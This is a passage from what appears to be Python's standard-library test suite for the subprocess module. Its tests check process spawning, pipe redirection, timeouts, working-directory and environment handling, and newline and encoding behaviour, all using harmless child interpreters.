stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# A Python debug build pushes something like "[42442 refs]\n"
# to stderr when the subprocess exits.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
